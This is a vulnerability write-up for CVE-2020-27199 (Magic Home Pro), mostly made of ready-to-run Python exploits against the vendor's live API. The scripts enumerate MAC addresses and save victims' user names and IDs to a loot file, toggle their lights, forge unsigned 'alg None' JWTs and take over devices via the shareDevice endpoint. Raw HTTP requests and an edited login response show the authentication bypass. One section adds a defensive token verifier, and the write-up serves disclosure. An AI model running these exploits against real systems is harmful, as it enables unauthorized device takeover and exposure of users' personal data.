This article gives a worked analysis of the Magic Home Pro authentication bypass vulnerability CVE-2020-27199. The write-up is quite detailed and should be a useful reference; interested readers should read it through to the end.
A rooted Android phone;
JAR re-signing and APK rebuild;
Frida certificate-pinning bypass;
Affected application: Magic Home Pro
Product vendor: JadeHomic
WiFi controller vendor: Suzhou SmartChip Semiconductor Co.,Ltd
Vendor website: JadeHomic
Affected product code: Magic Home Pro
This vulnerability allows any authenticated user, at their current authorization level, to query endpoints that have nothing to do with their own registered products by calling the /app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address> API. The server's response indicates whether the target node exists and, if it does, returns the user name, user unique identifier (userUniID) and binding unique ID (bindedUniID) associated with that node.
Having run the query above, an attacker can send commands to the remote node with an unauthorized POST request to the /app/sendCommandBatch/ZG001 API, using the newly enumerated MAC address and the compatible hex commands 71230fa3 (ON) and 71240fa4 (OFF).
Once the initial enumeration is done, the attacker can also forge a JWT from the userID and uniID carried in the JWT payload; in essence the token can be downgraded to the "None" algorithm in the JWT header field (a signature bypass). With that token the attacker can make a remote API call to /app/shareDevice/ZG001, passing the friendUserID JSON parameter, to add the target device to the attacker's own device list, at which point the attacker has full control of the target device.
Authentication bypass
Information disclosure
Unauthorized access
Horizontal privilege escalation
Requires an authenticated user
Successful enumeration of existing endpoint systems
Batch commands subsequently sent to the remote node
Device takeover
Authentication bypass
Our PoC enumerates the last byte of the MAC address range and returns the results; if you need to, you can also test the "remote execution" effect.
import requests
import json
import os
from colorama import init
from colorama import Fore, Back, Style
import re

'''
First Stage Authentication
Second Stage Enumerate
Third Stage Remote Execute
'''

global found_macaddresses
found_macaddresses = []
global outtahere
outtahere = ""
q = "q"
global token

def turnOn(target, token):
    # Batch command endpoint; 71230fa3 is the controller's ON command
    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems":[
            {"hexData":"71230fa3","macAddress":target}
        ]
    }
    data = json.dumps(array)
    headersOn = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token":token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print (Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOn, data=data, headers=headersOn)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
        else:
            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")

def turnOff(target, token):
    # Same endpoint; 71240fa4 is the controller's OFF command
    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems":[
            {"hexData":"71240fa4","macAddress":target}
        ]
    }
    data = json.dumps(array)
    headersOff = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token":token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print (Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOff, data=data, headers=headersOff)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
        else:
            print (Fore.RED + "[-] Failed to switch off Endpoint " + Style.RESET_ALL + f"{target}")

def lighItUp(target, token):
    # Interactive ON/OFF loop for one 12-hex-digit MAC address
    outtahere = ""
    q = "q"
    if len(str(target)) < 12:
        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
        while outtahere.lower() != q.lower():
            if outtahere == "0":
                turnOn(target, token)
            elif outtahere == "1":
                turnOff(target, token)
            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)

def Main():
    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
    data = {
        "userID":"<Valid Registered Email/Username>",
        "password":"<Valid Registered Password>",
        "clientID":""
    }
    headersAuth = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    # First Stage Authenticate
    os.system('clear')
    print (Fore.WHITE + "[+] Authenticating ...")
    response = requests.post(urlAuth, json=data, headers=headersAuth)
    resJsonAuth = response.json()
    token = (resJsonAuth['token'])
    # Second Stage Enumerate
    print (Fore.WHITE + "[+] Enumerating ...")
    macbase = "C82E475DCE"
    macaddress = []
    a = ["%02d" % x for x in range(100)]
    for num in a:
        macaddress.append(macbase+num)
    with open('loot.txt', 'w') as f:
        for mac in macaddress:
            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
            params = {
                "macAddress":mac
            }
            headersEnum = {
                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
                "Accept-Language": "en-US",
                "Content-Type": "application/json; charset=utf-8",
                "Accept": "application/json",
                "token": token,
                "Host": "wifij01us.magichue.net",
                "Connection": "close",
                "Accept-Encoding": "gzip, deflate"
            }
            response = requests.get(urlEnum, params=params, headers=headersEnum)
            resJsonEnum = response.json()
            data = (resJsonEnum['data'])
            if not data:
                pass
            elif data:
                found_macaddresses.append(mac)
                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
            else:
                print (Fore.RED + "[-] No results found!")
    print(Style.RESET_ALL)
    # Third Stage Remote Execute
    if not found_macaddresses:
        print (Fore.RED + "[-] No MAC addresses retrieved")
    elif found_macaddresses:
        attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
        if (attackboolean.upper() == 'Y'):
            target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
            lighItUp(target, token)
        elif (attackboolean.upper() == 'N'):
            print (Fore.CYAN + "Sometimes, belief isn't about what we can see. It's about what we can't." + Style.RESET_ALL)
        else:
            print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)

if __name__ == "__main__":
    Main()
Using the userID and uniqID returned by a successful enumeration, the attacker can run this token-forging PoC to generate a new "signed" token that bypasses the JWT check.
#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''

def Usage():
    print (f"Usage: {sys.argv[0]} <username> <unique id>")

def Main(user, uniqid):
    os.system('clear')
    print ("[+] Encoding ...")
    print ("[+] Bypass header created!")
    print ("HTTP/1.1 200")
    print ("Server: nginx/1.10.3")
    print ("Date: "+str(format_date_time(stamp))+"")
    print ("Content-Type: application/json;charset=UTF-8")
    print ("Connection: close\r\n\r\n")
    # Header downgraded to alg "None"; the token carries an empty signature segment
    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])
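As an added example (not part of the original write-up or the vendor's code), the server-side check that defeats this forgery: a token verifier with an explicit algorithm allow-list, a non-empty-signature requirement, constant-time HMAC comparison and expireDate enforcement, written against the same header/payload shape the PoC above builds. The secret, the HS256 choice and the claim values are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed demo secret; a real deployment loads this from a secret store.
SERVER_SECRET = b"constructed-demo-secret"
ALLOWED_ALGS = {"HS256"}  # explicit allow-list: "none"/"None" can never match

def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_token(claims: dict, secret: bytes = SERVER_SECRET) -> str:
    """Issue a legitimately signed HS256 token (used here only to build a valid sample)."""
    header = _b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    payload = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"

def verify_token(token: str, secret: bytes = SERVER_SECRET,
                 now_ms: Optional[int] = None) -> Optional[dict]:
    """Return the claims if the token is valid, otherwise None.
    alg is checked against the allow-list before the signature is touched, so a
    token downgraded to alg None with an empty signature (the shape the forgery
    PoC produces) is refused; the HMAC is compared in constant time and the
    expireDate claim (milliseconds, as in the app's tokens) is enforced."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:  # malformed base64 or JSON
        return None
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS or not sig:
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    now_ms = int(time.time() * 1000) if now_ms is None else now_ms
    if not isinstance(claims, dict) or claims.get("expireDate", 0) <= now_ms:
        return None
    return claims
```

A verifier that instead reads the algorithm from the header and honours it is exactly what the PoC's "None" downgrade relies on.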
The attacker can then exploit the flaw with the attacker's own email (the registered account that will receive the target device), the target user's email (the account being taken over), the target device's MAC address (the one associated with the target email) and the forged token to take over the target device.
#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re

def Usage():
    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")

def Main():
    attacker_email = sys.argv[1]
    target_email = sys.argv[2]
    target_mac = sys.argv[3]
    forged_token = sys.argv[4]
    os.system('clear')
    print (Fore.WHITE + "[+] Sending Payload ...")
    # shareDevice is called with the forged (victim) token; friendUserID is the attacker's account
    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
    array = {"friendUserID":attacker_email, "macAddress":target_mac}
    data = json.dumps(array)
    headers = {
        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token":forged_token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    response = requests.post(url, data=data, headers=headers)
    if response.status_code == 200:
        if "true" in response.text:
            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
        else:
            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)

if __name__ == "__main__":
    if len(sys.argv) < 5:
        Usage()
    else:
        Main()
POST Request

POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}

Response

HTTP/1.1 200
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31

{"code":0,"msg":"","data":true}
Combining the JSON token forgery with the information gathered from the enumeration above (the target user's email, ClientID and UniqID), an attacker can bypass the mobile app's authentication process by tampering with the HTTP response, gaining unauthorized access to the application.
The attacker logs in to the Magic Home Pro app as the target user with the target's email address, an arbitrary password and an arbitrary clientID.
The attacker then rewrites the HTTP response using the details obtained in step 1, which lets the attacker complete the authentication bypass.
Original HTTP Login Request via Magic Home Pro Mobile app

POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate

{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}

Original HTTP Response

HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37

{"code":10033,"msg":"Password error"}

Edited HTTP Response

HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907

{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}